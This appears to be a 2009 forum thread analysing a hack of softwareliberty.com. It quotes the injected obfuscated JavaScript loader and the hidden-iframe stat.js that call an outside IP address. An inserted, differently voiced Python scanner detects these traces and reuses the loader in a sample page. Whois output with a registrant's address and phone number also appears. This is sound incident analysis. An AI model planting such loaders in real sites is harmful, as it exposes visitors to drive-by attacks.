
Please make softwareliberty.com safe again!

Joined: 2007-09-10

As I pointed out here: http://www.nuxified.org/topic/handing_glm_work_over_another_organization#comment-12996
softwareliberty.com is not safe.

Now I'm no expert in web security, but I think if the .html code has been changed, the server has been compromised...

I made a little investigation to see what exactly happens there:
The html code of the page contains a javascript part which gets a script stat.js from http://84.244.138.55/stats/stat.js

The code in index.html:

<script language="javascript">
<!--
var s="",i,c=0,o="";
var str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";
l=str.length;
for(c=0;c<=str.length-1;c++){
while(str.charAt(c)!='|')s=s+str.charAt(c++);
o=o+String.fromCharCode(s);
s="";}
document.write(o);
-->
</script>

Becomes this:

<script language="javascript">
document.write('<script type="text/javascript" src="http://84.244.138.55/stats/stat.js"></script>');
</script>

Currently (it may have been different before), stat.js looks like this:

document.open();
document.write('<iframe src="http://84.244.138.55/ts/in.cgi?sltest" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE></iframe>');
document.close();

Which seems to set up an invisible frame showing http://84.244.138.55/ts/in.cgi?sltest , which is currently a page looking like google.com but with some scripts inside it I haven't figured out yet. The page as well as stat.js may have changed anyway since google detected it as an attack site.

I attached all relevant files below, as well as a quick Python script I used to decrypt the ASCII (main code from http://love-python.blogspot.com/2008/04/convert-text-to-ascii-and-ascii-to-text.html).

Attachments (name, size):
ascii_decoder.py_.txt (1.33 KB)
index.html (5.96 KB)
stat.js_.txt (215 bytes)
index.html.1 (4.94 KB)
index.html.1.simplified.txt (4.94 KB)
secret.txt (283 bytes)
decoded.txt (118 bytes)
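The decoding loop in the injected page above is simple enough to reproduce and, more usefully, to turn into a check you can run over a site's own files after cleanup. The following is an added example (not the poster's attached ascii_decoder.py and not anything from the original thread): it decodes the pipe-delimited character codes exactly as the injected JavaScript does, then scans a page for any such blob and reports which remote URL it resolves to, and separately flags the zero-size iframe pattern from stat.js. The sample HTML, the clean control page and the stat.js text are constructed from the snippets quoted in the post; the function names and regexes are this example's own.

```python
import re

# Obfuscated string copied from the injected index.html quoted in the post.
OBFUSCATED = "60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|"

# Constructed sample page carrying the same loader block the post describes.
INFECTED_HTML = (
    '<html><head><title>Software Liberty</title></head><body>\n'
    '<p>Free software matters.</p>\n'
    '<script language="javascript">\n<!--\nvar s="",i,c=0,o="";\n'
    'var str="' + OBFUSCATED + '";\n'
    'l=str.length;\nfor(c=0;c<=str.length-1;c++){\n'
    "while(str.charAt(c)!='|')s=s+str.charAt(c++);\n"
    'o=o+String.fromCharCode(s);\ns="";}\ndocument.write(o);\n-->\n</script>\n'
    '</body></html>\n'
)

# Constructed control page with no injected loader.
CLEAN_HTML = ('<html><head><title>Software Liberty</title></head>'
              '<body><p>Free software matters.</p></body></html>')

# stat.js as quoted in the post (constructed copy for offline use).
STAT_JS = (
    "document.open();\n"
    "document.write('<iframe src=\"http://84.244.138.55/ts/in.cgi?sltest\" WIDTH=\"0%\" "
    "HEIGHT=\"0%\" MARGINHEIGHT=\"0\" MARGINWIDTH=\"0\" SCROLLING=\"auto\" frameborder=\"0\" "
    "NORESIZE></iframe>');\n"
    "document.close();\n"
)


def decode_pipe_charcodes(blob):
    """Do what the injected loop does: split on '|' and map each decimal code to a character."""
    return "".join(chr(int(code)) for code in blob.split("|") if code.strip())


# A quoted run of at least eight '|'-separated decimal codes: the obfuscated payload literal.
CHARCODE_BLOB_RE = re.compile(r'"((?:\d{1,3}\|){8,}\d{0,3}\|?)"')
# Absolute http(s) URLs used as src/href inside the decoded payload.
REMOTE_URL_RE = re.compile(r'(?:src|href)\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)
# An <iframe> whose width or height is 0 (or 0%), i.e. a frame meant to stay invisible.
HIDDEN_IFRAME_RE = re.compile(r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0%?["\']?[^>]*>', re.I)


def find_injected_loaders(html):
    """Return [(decoded_payload, [remote_urls])] for every charcode blob found in the page."""
    findings = []
    for m in CHARCODE_BLOB_RE.finditer(html):
        decoded = decode_pipe_charcodes(m.group(1))
        findings.append((decoded, REMOTE_URL_RE.findall(decoded)))
    return findings


def find_hidden_iframes(text):
    """Return the full tag text of every zero-size iframe in the given HTML or script source."""
    return HIDDEN_IFRAME_RE.findall(text)


def scan(html, *scripts):
    """Run both checks; an empty list means nothing suspicious was found."""
    report = []
    for decoded, urls in find_injected_loaders(html):
        report.append(f"obfuscated loader decodes to {decoded!r}; loads from {urls}")
    for src in scripts:
        for tag in find_hidden_iframes(src):
            report.append(f"zero-size iframe: {tag}")
    return report


if __name__ == "__main__":
    for line in scan(INFECTED_HTML, STAT_JS):
        print(line)
    print("clean page:", scan(CLEAN_HTML) or "no findings")
```

Running it on the constructed infected page prints the decoded `<script ... src="http://84.244.138.55/stats/stat.js">` tag and the hidden iframe; the clean page produces no findings. Adapting it to a real cleanup is a matter of reading each `.html` and `.js` file under the document root into `scan`, and re-running it after the site has been moved, since the thread shows the injection came back once.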
Joined: 2007-09-10

It turns out http://84.244.138.55/ts/in.cgi?sltest actually redirects directly to google.com. ^^
So index.html.1 is just a normal google page with google scripts.

$wget "http://84.244.138.55/ts/in.cgi?sltest"
--2009-04-22 17:02:13--  http://84.244.138.55/ts/in.cgi?sltest
Connecting to 84.244.138.55:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.com [following]
--2009-04-22 17:02:13--  http://www.google.com/
Resolving www.google.com... 74.125.39.99, 74.125.39.106, 74.125.39.105, ...
Connecting to www.google.com|74.125.39.99|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.de/ [following]
--2009-04-22 17:02:13--  http://www.google.de/
Resolving www.google.de... 74.125.39.104, 74.125.39.99, 74.125.39.106, ...
Reusing existing connection to www.google.com:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.html.4'

    [ <=>                                  ] 5,028       --.-K/s   in 0.03s

2009-04-22 17:02:13 (157 KB/s) - `index.html.4' saved [5028]

A little diff test (it makes no difference whether it's another wget google.com or a wget 84.244.138.55/ts/in.cgi?sltest):

$diff index.html.7 index.html.8
1c1
< <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>window.google={kEI:"bjLvScaeMNCNsAaEzcmPBw",kEXPI:"17259,20257",kHL:"de"};
---
> <html><head><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>Google</title><script>window.google={kEI:"cDLvSfrHEI-ysAbB4YyDBw",kEXPI:"17259,20257",kHL:"de"};
Joined: 2006-03-28

Here's what a really quick check revealed:

[dennis@thinkpad ~]$ host 84.244.138.55
55.138.244.84.in-addr.arpa domain name pointer web.xxxgallz.com.
[dennis@thinkpad ~]$ whois 84.244.138.55                    
[Querying whois.ripe.net]                                   
[whois.ripe.net]                                            
% This is the RIPE Whois query server #2.                   
% The objects are in RPSL format.                           
%                                                           
% Rights restricted by copyright.                           
% See http://www.ripe.net/db/copyright.html                 

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag

% Information related to '84.244.138.0 - 84.244.138.127'

inetnum:        84.244.138.0 - 84.244.138.127
netname:        Serverboost-2                
descr:          IP Space provided by We Dare 
country:        NL                           
admin-c:        Sr4706-RIPE                  
tech-c:         Sr4706-RIPE                  
status:         ASSIGNED PA                  
mnt-by:         WEDARE-MNT                   
source:         RIPE # Filtered              

role:           Serverboost role
address:        Piet Paaltjensplein 62
address:        3027 TZ Rotterdam     
address:        The Netherlands       
phone:          +31 (0)6 1482 4915    
abuse-mailbox:    
admin-c:        JM6856-RIPE           
tech-c:         JM6856-RIPE           
nic-hdl:        Sr4706-RIPE           
mnt-by:         MNT-I3D               
source:         RIPE # Filtered       

% Information related to '84.244.128.0/18AS20495'

route:        84.244.128.0/18
descr:        Route to first IP-numberblock We Dare BV
origin:       AS20495                                 
mnt-by:       WEDARE-MNT                              
source:       RIPE # Filtered                         

% Information related to '84.244.128.0/19AS20495'

route:          84.244.128.0/19
descr:          We Dare B.V.   
origin:         AS20495        
mnt-by:         WEDARE-MNT     
source:         RIPE # Filtered
[dennis@thinkpad ~]$ whois xxxgallz.com
[Querying whois.verisign-grs.com]      
[Redirected to whois.rrpproxy.net]     
[Querying whois.rrpproxy.net]          
[whois.rrpproxy.net]                   
; This data is provided by Transip BV  
; for information purposes, and to assist persons obtaining information
; about or related to domain name registration records.                
; Transip BV does not guarantee its accuracy.                          
; By submitting a WHOIS query, you agree that you will use this data   
; only for lawful purposes and that, under no circumstances, you will  
; use this data to                                                     
; 1) allow, enable, or otherwise support the transmission of mass      
;    unsolicited, commercial advertising or solicitations via E-mail   
;    (spam); or                                                        
; 2) enable high volume, automated, electronic processes that apply    
;    to this WHOIS server.                                             
; These terms may be changed without prior notice.                     
; By submitting this query, you agree to abide by this policy.         

DOMAIN: XXXGALLZ.COM

RSP: Transip BV 
URL: http://www.transip.nl/

owner-contact: P-DQA565
owner-organization: ardon, d
owner-fname: D              
owner-lname: ardon          
owner-street: eessenkamp 8  
owner-city: wapenveld       
owner-zip: 8191             
owner-country: NL           
owner-phone: +31388442066   
owner-email: 

admin-contact: P-DQA565
admin-organization: ardon, d
admin-fname: D              
admin-lname: ardon          
admin-street: eessenkamp 8  
admin-city: wapenveld
admin-zip: 8191
admin-country: NL
admin-phone: +31388442066
admin-email: 

tech-contact: P-DQA565
tech-organization: ardon, d
tech-fname: D
tech-lname: ardon
tech-street: eessenkamp 8
tech-city: wapenveld
tech-zip: 8191
tech-country: NL
tech-phone: +31388442066
tech-email: 

billing-contact: P-DQA565
billing-organization: ardon, d
billing-fname: D
billing-lname: ardon
billing-street: eessenkamp 8
billing-city: wapenveld
billing-zip: 8191
billing-country: NL
billing-phone: +31388442066
billing-email: 

nameserver: ns1.exmasters.com
nameserver: ns2.exmasters.com

; Transip BV
; Real-time domeinregistratie en -beheer vanaf 4.99 Euro!
; http://www.transip.nl/products/domain/
Joined: 2006-09-11

I'm fixing this right now. softwareliberty.com is still hosted in our shared host at DreamHost and it got hacked (well, nothing else can explain this; neither Olivier nor I would do this), so I'm moving it to our dedicated server.

I forgot that KIAaze reported this in another thread, sorry. I started working on this because of https://tracker.gnulinuxmatters.org/ticket/326

Thank you, reptiler and KIAaze.

Joined: 2007-09-10

Thanks for fixing it.
It's now 100% fixed since Google doesn't mark it as an attack site anymore.

I'll remember to use the GLM tracker (or the mailing list) instead of the forum next time.

By the way: How dangerous is it to be redirected to Google from another server?
Can they somehow intercept authentication data when you have a Google account for example?

Joined: 2007-09-10
Re: Please make softwareliberty.com safe again!

The bugtracker being a little bit slow, I'll post here again.
http://www.softwareliberty.com/ seems to have been hacked again.

I started directing people directly to the FSF site instead because of this.
Hopefully, this will never happen to http://linuxpreloaded.com/ because I don't know any equivalent for it. (Bought myself a new GNU/Linux preloaded PC through it from http://www.i-ventive.com/)

(If softwareliberty can't be made safe, it would be nice to remove/replace all links to it from the other GLM sites.)
